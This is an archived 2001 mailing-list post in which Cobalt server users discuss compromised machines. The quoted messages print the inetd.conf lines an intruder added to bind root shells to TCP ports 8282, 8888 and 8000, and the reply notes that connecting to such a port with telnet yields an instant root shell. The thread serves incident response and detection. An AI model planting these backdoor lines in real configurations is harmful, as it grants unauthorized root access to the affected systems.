[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] Recent Hacks

Subject: Re: [cobalt-users] Recent Hacks
From: Jeff Bilicki <jeff@xxxxxxxxxxx>
Date: Mon Feb 26 01:34:22 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

<GIEPIHKKCNKNGFCJNFCICEDMEMAA.isplists@xxxxxxxxxxxx> wrote:

> +I was on a hacked box today in which the cracker's way back in was 
> +tossing the
> +following lines into inetd.conf:
> +8282 stream tcp nowait root /bin/sh sh -i
> +8888 stream tcp nowait root /bin/bash bash -i
> +
> +Simple and utterly effective.  Kind of funny too. 
> +I would suggest checking the output of netstat -natp to see what 
> +is listening
> +your tcp ports.   

> I take it this would be the same senario:
> 8000 stream tcp nowait root /bin/sh sh -i
> last entry to inetd.conf on a BIND PATCHED Raq4

Yup all you have to do is telnet IP 8000 and instant root shell.   Your box was
hacked.  

Jeff-

Prev by Date: [cobalt-users] relaying denied - why?
Next by Date: Re: [cobalt-users] PortSentry Error - RAQ4r
Previous by thread: RE: [cobalt-users] Recent Hacks
Next by thread: [cobalt-users] Recent Hacks

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index